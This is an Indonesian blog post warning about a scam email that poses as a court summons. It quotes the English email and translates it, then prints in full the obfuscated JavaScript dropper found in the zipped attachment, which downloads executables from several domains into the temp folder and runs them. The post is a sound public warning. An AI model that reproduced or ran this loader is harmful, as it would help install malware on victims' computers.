10 November 2015

Modus Scam Email Panggilan Pengadilan

Adalah suatu hal mengejutkan bagi saya ketika membuka email. Saya mendapat pemberitahuan panggilan untuk menghadiri suatu persidangan. Email tersebut disampaikan dalam bahasa Inggris yang meminta saya untuk menghadiri persidangan pada waktu yang sudah ditentukan.

Dipopedia-NoticetoappearinCourt.png

Berikut ini isi dari email tersebut:

Notice to Appear,

This is to inform you to appear in the Court on the October 29 for your case hearing.
Please, do not forget to bring all the documents related to the case.
Note: If you do not come, the case will be heard in your absence.

You can find the Court Notice is in the attachment.

Regards,
Ben Johns,
Clerk of Court.


Jika diterjemahkan dalam bahasa Indonesia, maka email tersebut berisi:

Perhatikan untuk Tampil,

Ini adalah untuk memberitahu Anda untuk muncul di Pengadilan pada 29 Oktober untuk sidang kasus Anda.
Tolong, jangan lupa untuk membawa semua dokumen yang berkaitan dengan kasus tersebut.
Catatan: Jika Anda tidak datang, kasus ini akan didengar dalam ketiadaan.

Anda dapat menemukan Notice Mahkamah dalam lampiran.

Salam,
Ben Johns,
Panitera Pengadilan.


Berhubung rasa penasaran saya maka menindaklanjuti email tersebut dengan mengunduh berkas yang dilampirkan. Namun setelah saya selidiki lebih lanjut, berkas tersebut yang dikompres dengan ekstensi zip berisi javascript yang tidak dapat saya ketahui lebih lanjut isinya adapun berkas terkompress tersebut berisi berkas dengan judul 00000911547[dot]doc[dot]js yang memuat keterangan sebagai berikut:

var str="55515C5E000D140B1711160108240309050D084A070B095E275E091117100D0F0B0A1D054A070B095E17555E555050515255515657505E56"; function sltj() { iay += 'ject('; }; var kszu = ''; function eao() { iay += 'id='; }; function iiq() { iay += ' i'; }; function mvqb() { iay += '0) {'; }; function yrmv() { iay += '+n'; }; function rnbf() { iay += 't("A'; }; function aud() { iay += '.Cre'; }; function nol() { iay += ');'; }; function alvs() { iay += 'ate'; }; function kcr() { iay += 'd=122'; }; function pbbz() { iay += '("'; }; function tex() { iay += 'nseB'; }; function xjfw() { iay += 'r xo '; }; function mjr() { iay += 'ody'; }; function eyw() { iay += '= ws'; }; function unl() { iay += 'LHT'; }; function itjs() { iay += 'Sc'; }; function wxtn() { iay += 'va'; }; function brez() { iay += 't.Cre'; }; function jbtd() { iay += 'Ob'; }; function swpg() { iay += 'ry '; }; function nlz() { iay += 'ef'; }; function koc() { iay += 'rich'; }; function atci() { iay += '"+b['; }; function var() { iay += '= WSc'; }; function dld() { iay += '; xa.'; }; function jew() { iay += '2.XM'; }; function lxnc() { iay += '(); '; }; function hlek() { iay += 'mChar'; }; function wgqy() { iay += 'ET'; }; function jucd() { iay += ' }; }'; }; function kpt() { iay += 'formi'; }; function xlu() { iay += '1) {'; }; function nyvd() { iay += 'a = W'; }; function lmk() { iay += ') {'; }; function qaiv() { iay += 'iro'; }; function hfa() { kszu = this; }; function jzpd() { vyf += 'ev'; }; function kpkn() { iay += 'it("'; }; function uzdk() { iay += '{ ws.'; }; function vfa() { iay += 'ervi'; }; function nwtk() { iay += 'at'; }; function woe() { iay += 'f ('; }; function cafl() { iay += '.Expa'; }; function dmdy() { iay += 'ar ld'; }; function racu() { iay += ' (er'; }; function qpg() { iay += 'tion'; }; function jyko() { iay += ' = '; }; var iay = ''; var vyf = ''; function gvbu() { iay += ' = 1'; }; function rxbd() { iay += 'exe'; }; function wug() { iay += 'siz'; }; function qieg() { iay += '+".'; }; function swf() { iay += 'tring'; }; function vcx() { iay += 'sof'; }; function kxc() { iay += 'r/?'; }; function rjma() { iay += 'www.'; }; function wqi() { iay += 'ace'; }; function cvve() { iay += 'ro'; }; function jsp() { iay += '+) {'; }; function gjch() { iay += ',2);'; }; function allf() { iay += 'ip'; }; function xsgw() { iay += '",1,'; }; function aozk() { iay += '")+S'; }; function puw() { iay += '.op'; }; function mptr() { iay += ' var '; }; function lmei() { iay += '; xa.'; }; function unyf() { iay += 'ar x'; }; function del() { iay += ' fal'; }; function nqlk() { iay += ' (xo'; }; function lznm() { iay += 'lengt'; }; function ywmx() { vyf += 'al'; }; function fey() { iay += '<='; }; function sucr() { iay += 'o.op'; }; function pncu() { iay += '");'; }; function rxxo() { iay += '.spl'; }; function hot() { iay += 'itio'; }; function qrpo() { iay += ' ld '; }; function rvo() { iay += '1"+n,'; }; function zzh() { iay += 'ht'; }; function exc() { iay += '.st'; }; function eeyy() { iay += ' (v'; }; function iroy() { iay += 'e > '; }; function gzuy() { iay += 'MP%'; }; function ocda() { iay += '&rn'; }; function ziyk() { iay += 'exe"'; }; function xcu() { iay += 'lose'; }; function htvk() { iay += 'dn '; }; function kjdz() { iay += ' v'; }; function vibz() { iay += '100'; }; function qnb() { iay += ' 1; '; }; function ror() { iay += '","'; }; function htrq() { iay += '=1;'; }; function sebu() { iay += '3; '; }; function ehyj() { iay += 'Run'; }; function hjko() { iay += 'n '; }; function fic() { iay += 'ject'; }; function aau() { iay += 'ri'; }; function qxv() { iay += 'Scr'; }; function lljd() { iay += ')+'; }; function qqjn() { iay += ' b = '; }; function lxay() { iay += ' { }'; }; function aetu() { iay += '); x'; }; function uaab() { iay += 'l")'; }; function lodc() { iay += 'ript'; }; function xqj() { iay += 'xa.'; }; function xfee() { iay += '61'; }; function jkb() { iay += 'Co'; }; function jrs() { iay += 'ch'; }; function rvf() { iay += 's =='; }; function cyy() { iay += 'com"'; }; function ytd() { iay += ' ='; }; function lbn() { iay += ' n'; }; function edei() { iay += '89"; '; }; function jdkb() { iay += 'h '; }; function fypp() { iay += 'n++)'; }; function eemy() { iay += 'TP");'; }; function qkm() { iay += 'nm'; }; function xyoo() { iay += 'DB'; }; function xvnl() { iay += 'pat.'; }; function ndr() { iay += '.com '; }; function hflz() { iay += '"W'; }; function nzfg() { iay += ' = 0'; }; function dye() { iay += 'ws'; }; function jhw() { iay += '}; }'; }; function pybi() { iay += ' t'; }; function epew() { iay += 'a.c'; }; function fol() { iay += ' xa.'; }; function sqvv() { iay += ' c'; }; function ybk() { iay += '"w'; }; function xex() { kvfl(iay); }; function qpes() { iay += 'pt.'; }; function zimn() { iay += '("%TE'; }; function pxed() { iay += '0; tr'; }; function gck() { iay += 'sa'; }; var kvfl = ''; function uho() { iay += '00) '; }; function gwj() { iay += '; '; }; function eps() { iay += 'rip'; }; function jrcq() { iay += '"G'; }; function nuc() { iay += '(er)'; }; function lvaa() { iay += '{ xa'; }; function ehb() { iay += 'or'; }; function kpm() { iay += '25'; }; function whqi() { iay += ' 2'; }; function jwkg() { iay += ' (v'; }; function vpty() { iay += 'en'; }; function iqm() { iay += 'de(92'; }; function kog() { iay += 'WSc'; }; function mrij() { iay += '); if'; }; function nje() { iay += '.fro'; }; function djtz() { iay += '+"'; }; function vutr() { iay += 'ent'; }; function cjwa() { iay += '0); '; }; function gnl() { iay += ' v'; }; function vht() { iay += '; bre'; }; function anch() { iay += 'ar '; }; function lhbf() { iay += 'bjec'; }; function iesl() { iay += 'm '; }; function rjko() { iay += 'pa'; }; function xfz() { iay += 'DO'; }; function ejj() { iay += 'littl'; }; function mbqj() { iay += 'y '; }; function oopt() { iay += 'd;'; }; function uprt() { iay += 'co'; }; function hnl() { iay += ' dn'; }; function lki() { iay += 'fn+n'; }; function xlex() { iay += '(fn'; }; function psnq() { iay += 'i]+'; }; function jzkx() { iay += 'i=l'; }; function dkku() { iay += 'ass'; }; function fjms() { iay += 'xa'; }; function ofl() { iay += 'en('; }; function tjup() { iay += '; }'; }; function vuy() { iay += 'nd('; }; function phgv() { iay += 'Creat'; }; function rpfw() { iay += 'eOb'; }; function bnq() { iay += '} '; }; function zhq() { iay += 'var'; }; function ozlb() { iay += 'gs'; }; function bsbr() { iay += 'ak'; }; function jhyg() { iay += 'ww.g'; }; function fhd() { iay += '; '; }; function jzt() { iay += '};'; }; function gos() { iay += 'ar '; }; function yvil() { iay += 'up'; }; function vvd() { iay += '"+str'; }; function mfra() { iay += '; x'; }; function acf() { iay += '+".'; }; function uuk() { iay += 'File('; }; function uso() { iay += '"51'; }; function ccl() { iay += 'po'; }; function hel() { kvfl = kszu[vyf]; }; function vik() { iay += 'ounte'; }; function csyk() { iay += 'ndEnv'; }; function pmh() { iay += ' ");'; }; function uinm() { iay += 'var f'; }; function scvf() { iay += '= i'; }; function oajn() { iay += 'atu'; }; function tlx() { iay += '.writ'; }; function txn() { iay += 'veTo'; }; function enl() { iay += '};'; }; function gpex() { iay += 'nam'; }; function momh() { iay += 'Strin'; }; function tlwc() { iay += '{ x'; }; function snk() { iay += 'and'; }; function hbfp() { iay += ' v'; }; function trsd() { iay += 'a-'; }; function hdg() { iay += '"/c'; }; function xyt() { iay += 'tc'; }; function kom() { iay += ' if ('; }; function jvf() { iay += ' { f'; }; function odbp() { iay += 'MSXML'; }; function eqe() { iay += 't.Sh'; }; function ebcq() { iay += 'o.res'; }; function cgl() { iay += 'ces.'; }; function xom() { iay += 'ngs'; }; function minu() { iay += 'type'; }; function vcy() { iay += 'el'; }; function npi() { iay += 'ocia'; }; function qswb() { iay += '== '; }; function kkkr() { iay += 'se'; }; function xtrq() { iay += 'tp://'; }; function gsu() { iay += 'n = 0'; }; function uag() { iay += 'ream'; }; function jhr() { iay += 'dn = '; }; function fhp() { iay += 'ateO'; }; function jbyy() { iay += '.St'; }; function hics() { iay += 'pos'; }; function gayb() { iay += '();'; }; function evd() { iay += 'e(x'; }; function eyql() { iay += 'o.se'; }; function nobw() { iay += 'ar n'; }; function cpg() { iay += '; '; }; function lyn() { iay += 'ca'; }; function kixo() { iay += 'h; i+'; }; function lif() { iay += ' i<b.'; }; function epps() { iay += '; for'; };zhq(); qqjn(); ybk(); jhyg(); cvve(); yvil(); kpt(); xom(); vfa(); cgl(); uprt(); iesl(); ejj(); nlz(); wqi(); vcx(); rjko(); gpex(); trsd(); dkku(); npi(); qpg(); ndr(); rjma(); koc(); snk(); xvnl(); cyy(); rxxo(); kpkn(); pmh(); mptr(); dye(); jyko(); kog(); lodc(); aud(); alvs(); jbtd(); sltj(); hflz(); itjs(); eps(); eqe(); vcy(); uaab(); fhd(); uinm(); hjko(); eyw(); cafl(); csyk(); qaiv(); qkm(); vutr(); momh(); ozlb(); zimn(); gzuy(); aozk(); swf(); nje(); hlek(); jkb(); iqm(); lljd(); uso(); xfee(); edei(); wxtn(); xjfw(); var(); aau(); qpes(); phgv(); rpfw(); fic(); pbbz(); odbp(); jew(); unl(); eemy(); hbfp(); unyf(); nyvd(); qxv(); allf(); brez(); fhp(); lhbf(); rnbf(); xfz(); xyoo(); jbyy(); uag(); pncu(); gnl(); dmdy(); nzfg(); epps(); jwkg(); nobw(); htrq(); lbn(); fey(); sebu(); fypp(); jvf(); ehb(); eeyy(); anch(); jzkx(); oopt(); lif(); lznm(); kixo(); jsp(); kjdz(); gos(); jhr(); pxed(); mbqj(); tlwc(); sucr(); ofl(); jrcq(); wgqy(); ror(); zzh(); xtrq(); atci(); psnq(); hdg(); vik(); kxc(); eao(); vvd(); djtz(); ocda(); kcr(); kpm(); rvo(); del(); kkkr(); aetu(); eyql(); vuy(); mrij(); nqlk(); exc(); oajn(); rvf(); whqi(); uho(); lvaa(); puw(); vpty(); gayb(); fol(); minu(); ytd(); qnb(); fjms(); tlx(); evd(); ebcq(); ccl(); tex(); mjr(); nol(); iiq(); woe(); xqj(); wug(); iroy(); vibz(); mvqb(); hnl(); gvbu(); lmei(); hics(); hot(); gsu(); dld(); gck(); txn(); uuk(); lki(); qieg(); ziyk(); gjch(); pybi(); swpg(); uzdk(); ehyj(); xlex(); yrmv(); acf(); rxbd(); xsgw(); cjwa(); bnq(); lyn(); xyt(); jdkb(); nuc(); lxay(); tjup(); mfra(); epew(); xcu(); lxnc(); enl(); kom(); htvk(); qswb(); xlu(); qrpo(); scvf(); vht(); bsbr(); cpg(); jhw(); sqvv(); nwtk(); jrs(); racu(); lmk(); jucd(); gwj(); jzt(); jzpd(); ywmx(); hfa(); hel(); xex();


Saya tidak tahu niat sesungguhnya orang yang mengirim email tersebut namun setelah saya lakukan penyelidikan lebih lanjut ternyata email yang saya terima tersebut termasuk email scam yang tidak memberikan manfaat pun bagi saya. Selain itu, berkas lampiran yang terkandung di dalamnya akan dapat menginstal program jahat (malware) pada komputer saya.
Tidak ada komentar: